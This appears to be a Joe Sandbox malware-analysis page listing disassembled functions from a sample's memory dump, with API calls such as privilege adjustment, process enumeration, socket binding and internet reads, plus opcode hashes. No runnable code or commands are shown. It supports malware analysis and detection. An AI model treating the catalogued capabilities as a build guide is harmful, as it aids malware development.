Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 2768fc299cc0a919766367467bc7ff96aaffcb5a5065bc08396ef7052ebd623e
Instruction ID: 18f3d3c82ed2573e2a249cf81e9e65bab39b7359c2c03bfa0d98ace3cbad5596
Opcode Fuzzy Hash: 2768fc299cc0a919766367467bc7ff96aaffcb5a5065bc08396ef7052ebd623e
Instruction Fuzzy Hash: A021D2306002049FCB10EF64C845B6EB7B9EF49720F55426AED26AB391C774EC46CB65

Function 003B5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 003C0DB6: std::exception::exception.LIBCMT ref: 003C0DEC
Part of subcall function 003C0DB6: __CxxThrowException@8.LIBCMT ref: 003C0E01

_memmove.LIBCMT ref: 003F0258
_memmove.LIBCMT ref: 003F036D
_memmove.LIBCMT ref: 003F0414

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: fcb7c8dbcffa5ca21e97f2da93de10e56b9bdf61f27caf9bc45d9b5642a8b766
Instruction ID: 6681b584d201c2d812b8cbe80725bcd8b764bae375199c7bcdd36f34a0790b45
Opcode Fuzzy Hash: fcb7c8dbcffa5ca21e97f2da93de10e56b9bdf61f27caf9bc45d9b5642a8b766
Instruction Fuzzy Hash: E402B070A00209DBCF0ADF68D982ABE7BB5EF45304F158069E90ADF256EB35DD50CB91

Function 003A1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 003A19FA
GetSysColor.USER32(0000000F), ref: 003A1A4E
SetBkColor.GDI32(?,00000000), ref: 003A1A61

Part of subcall function 003A1290: DefDlgProcW.USER32(?,00000020,?), ref: 003A12D8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 691f2873b56a43e784529aa6f6c63849e6c6f321ad1984cc42367b7b11a142d7
Instruction ID: 566565819cace3a482f9317d8ac94f7025908900b32ef021da0f4e0fc5833373
Opcode Fuzzy Hash: 691f2873b56a43e784529aa6f6c63849e6c6f321ad1984cc42367b7b11a142d7
Instruction Fuzzy Hash: 24A19A72202594FAE72BAB29AC54E7F355CDF43385F53011FF402C6A92DB248D01D2BA

Function 00416747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00417D8B: inet_addr.WSOCK32(00000000), ref: 00417DB6

socket.WSOCK32(00000002,00000002,00000011), ref: 0041679E
WSAGetLastError.WSOCK32(00000000), ref: 004167C7
bind.WSOCK32(00000000,?,00000010), ref: 00416800
WSAGetLastError.WSOCK32(00000000), ref: 0041680D
closesocket.WSOCK32(00000000), ref: 00416821

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: e37d86366d0871659f482bcbbedb3c6353d7ee73903fbcf08ce774c8d6eb4682
Instruction ID: c12ac561ab3c3c4c318dd6a5db7686e2eea5e88e19e6e7dc3382a5c069650ddb
Opcode Fuzzy Hash: e37d86366d0871659f482bcbbedb3c6353d7ee73903fbcf08ce774c8d6eb4682
Instruction Fuzzy Hash: B141D275B00200AFDB11BF248C86F6E77E8DB0A714F44846DF919AF3C2CA749D018791

Function 00425376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004253C5
IsWindowEnabled.USER32 ref: 004253D3
GetForegroundWindow.USER32(?,?,00000001), ref: 004253E0
IsIconic.USER32 ref: 004253EE
IsZoomed.USER32 ref: 004253FC

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: a5aa836b54d413cac4b739e3a7ec517e2cea54164fb5ec0257b06a4391dafa7b
Instruction ID: 9ecbb07d9192bc454e6aecc9bfa46472024fc4db6898de099a5afd5aa2ef01a2
Opcode Fuzzy Hash: a5aa836b54d413cac4b739e3a7ec517e2cea54164fb5ec0257b06a4391dafa7b
Instruction Fuzzy Hash: 511186317005216BD721AF26AC44B6BBBADEF457A1BC0443AFC45D7241CBB8DD0286A9

Function 003F80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003F80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003F80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003F80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003F80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003F80F6

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 67f30de844e83743c5387219ead7b38dfe5151647eba15f54897603e687a83de
Instruction ID: 1a566fe5822884170d6648e42f279420d2525a3004472af5d6e4ccea265dfbb8
Opcode Fuzzy Hash: 67f30de844e83743c5387219ead7b38dfe5151647eba15f54897603e687a83de
Instruction Fuzzy Hash: A6F04F31340208AFEB214FA5EC8DE773BBCEF49755B800135FA45D6160CB619C46DA64

Function 003AE6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

DdF, xrefs: 003AEABA
DdF, xrefs: 003E3B2E
DdF, xrefs: 003E3AF5
Variable must be of type 'Object'., xrefs: 003E3E62
DdF, xrefs: 003AEAC1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID: DdF$DdF$DdF$DdF$Variable must be of type 'Object'.
API String ID: 0-1148220131
Opcode ID: d4591ab328d6b7030395e08c5ed1d0f41ffc6137dc80ec71e016bfaa8f6ef10e
Instruction ID: d3ee9d4e691b2570887acb51c84580c869348f701c16ceefb244d661e1eaa075
Opcode Fuzzy Hash: d4591ab328d6b7030395e08c5ed1d0f41ffc6137dc80ec71e016bfaa8f6ef10e
Instruction Fuzzy Hash: 7DA2D274A00215CFCB26CF94C480AAEB7F6FF5A314F268569E805AB391D735ED42CB91

Function 0040C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040C432
CoCreateInstance.OLE32(00432D6C,00000000,00000001,00432BDC,?), ref: 0040C44A

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

CoUninitialize.OLE32 ref: 0040C6B7

Strings

.lnk, xrefs: 0040C3C6, 0040C3EE, 0040C3F8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: c7e6d665c3a9a9d3ca1cddcf1f41333eb3bf80d21f1f504c9e8f0343e9bd3991
Instruction ID: 685180bf5d82043145c10a87463d478c17c66445e52c96df2fe9ac67640ba4a6
Opcode Fuzzy Hash: c7e6d665c3a9a9d3ca1cddcf1f41333eb3bf80d21f1f504c9e8f0343e9bd3991
Instruction Fuzzy Hash: BBA13971204205AFD701EF54C881EABB7ECFF8A354F00492DF5559B1A2EB71EA49CB62

Function 003A4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,003A4AD0), ref: 003A4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003A4B57

Strings

kernel32.dll, xrefs: 003A4B40
GetNativeSystemInfo, xrefs: 003A4B51

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: e923ae495b6937e6aad4216b919feeec64f8a9fa4a738ea024aeda168fd48afb
Instruction ID: 3517ba94ba19e5384f2c9daff2c230e9522dcce44d290c770642bb92e56da9ce
Opcode Fuzzy Hash: e923ae495b6937e6aad4216b919feeec64f8a9fa4a738ea024aeda168fd48afb
Instruction Fuzzy Hash: 70D01234B10723CFDB209F31E818B16B6F4AF45751BE1883E94C5D6550D7B8E884C66C

Function 0041EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0041EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0041EE4B

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Process32NextW.KERNEL32(00000000,?), ref: 0041EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0041EF1A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6343323f30db039c222ed654190ca2011ad50b65afd10def3b1597ed0633525a
Instruction ID: 448bc8d0e484a146d4b3407ae98a135172c06f0e486f8271dfb7d76fc5941b42
Opcode Fuzzy Hash: 6343323f30db039c222ed654190ca2011ad50b65afd10def3b1597ed0633525a
Instruction Fuzzy Hash: B8518271504300AFD311EF20CC85FABB7E8EF95750F50482DF9959B2A1DB74A909CB96

Function 003FE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 003FE628

Strings

|, xrefs: 003FE658
(, xrefs: 003FE66E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 91a3897240f5c95cde241fdb875b912b1ea29f26fe9885e9d3d5f3a3750befaf
Instruction ID: 1496d0f2fdde78f2b9a094e81e95d0a5fd853a4b4cd1cf8a9a7f442aa4d886b2
Opcode Fuzzy Hash: 91a3897240f5c95cde241fdb875b912b1ea29f26fe9885e9d3d5f3a3750befaf
Instruction Fuzzy Hash: 84323675A007099FDB29DF19C48196AB7F0FF48310B16C46EE99ADB3A1EB70E941CB40

Function 004122EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0041180A,00000000), ref: 004123E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00412418

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 417e08449dee81e9a088e072ae71445245efba899474243e9c6bf9274f9b320f
Instruction ID: a7fe747b7c4fbba38a68c6c146eeefdaeca3b8e97ab38c831ba83f12afaacb07
Opcode Fuzzy Hash: 417e08449dee81e9a088e072ae71445245efba899474243e9c6bf9274f9b320f
Instruction Fuzzy Hash: 9341F571600209BFEB209FA5DE81FFB77BCEB40314F10402FFA11E6240DAB89E919658

Function 0040B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0040B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0040B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0040B3EA

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 84668048667399632d98f46b4f657cce85a9c31537b60b551c9c70224830a435
Instruction ID: 6c192ccdec1645d4e62b1e3dee9989fbecd93e1abadc1bb2a6f18c9d3c05f04b
Opcode Fuzzy Hash: 84668048667399632d98f46b4f657cce85a9c31537b60b551c9c70224830a435
Instruction Fuzzy Hash: AD217135A00108EFCB00EFA5D885AEEBBB8FF49314F1480AAE905AB351CB359D16CB55

Function 003F87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 003C0DB6: std::exception::exception.LIBCMT ref: 003C0DEC
Part of subcall function 003C0DB6: __CxxThrowException@8.LIBCMT ref: 003C0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003F882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003F8858
GetLastError.KERNEL32 ref: 003F8865

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 056d06e00c2089b9c05863c48b51072fe52b7c7ee935eddc0d1481e45426b5de
Instruction ID: c51fd7fc715b24fdd2443de104c097fd05c5067f8eff5fb70a71009b02ca6640
Opcode Fuzzy Hash: 056d06e00c2089b9c05863c48b51072fe52b7c7ee935eddc0d1481e45426b5de
Instruction Fuzzy Hash: 13118CB2914208AFE729DFA4DC85D7BB7FCEB44750B60852EF45697241EB30BC418B60

Function 003F874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003F878B
FreeSid.ADVAPI32(?), ref: 003F879B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 46e3dab059bd21800389b60f9491d52f684d429859d0255d3f9c1388c77115fd
Instruction ID: 2802acc1734bf2473636a2f473fbc94eb7aa58d248f42f58633604e0c71e49cb
Opcode Fuzzy Hash: 46e3dab059bd21800389b60f9491d52f684d429859d0255d3f9c1388c77115fd
Instruction Fuzzy Hash: 90F03C75A1120CBBDB04DFE49D89AADB7B8EF08201F904479A501E2181D6716A088B54

Function 00408889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0040889B

Part of subcall function 003C520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00408F6E,00000000,?,?,?,?,0040911F,00000000,?), ref: 003C5213
Part of subcall function 003C520A: __aulldiv.LIBCMT ref: 003C5233

Strings

0eF, xrefs: 00408892

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eF
API String ID: 2893107130-1545553861
Opcode ID: d7911754e728d76b1b8ced0ab8688273a7b7fe9fdd0dda510aacade5234a813f
Instruction ID: ba297fee3aeb4f670082300b31c05aa0435f7790aa4d1981a023f6a96e7277e4
Opcode Fuzzy Hash: d7911754e728d76b1b8ced0ab8688273a7b7fe9fdd0dda510aacade5234a813f
Instruction Fuzzy Hash: 5F21A2336255108BC729CF29D841A52B3E1EFA5311B698E7DD0F6CB2C0DA74B905CB98

Function 0040C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0040C6FB
FindClose.KERNEL32(00000000), ref: 0040C72B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 524d92851492c4ee0e5508ad4cd53f0f19584cda94798a844935a7bde88a0e03
Instruction ID: 5151648de29362e7b436174b2d361c68001a35a80097fe7c7b0d45a3e130d283
Opcode Fuzzy Hash: 524d92851492c4ee0e5508ad4cd53f0f19584cda94798a844935a7bde88a0e03
Instruction Fuzzy Hash: 6F11A5716002049FDB10DF29C885A2AF7E8FF45320F40862EF9A9DB290DB34AC05CF95

Function 0040A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00419468,?,0042FB84,?), ref: 0040A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00419468,?,0042FB84,?), ref: 0040A0A9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e0377198655664fbdbf14c09630c54a1f76da74e6eab174c696f705114b85941
Instruction ID: 44a36d8d5e5bfeb9b0b0a899c02742656aa2518e48c3e475017b72da03f8d200
Opcode Fuzzy Hash: e0377198655664fbdbf14c09630c54a1f76da74e6eab174c696f705114b85941
Instruction Fuzzy Hash: 6BF0E23520522DBBDB219FA4CC48FEA736CFF09361F004176F808D6280C6349904CBA5

Function 003F81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003F8309), ref: 003F81E0
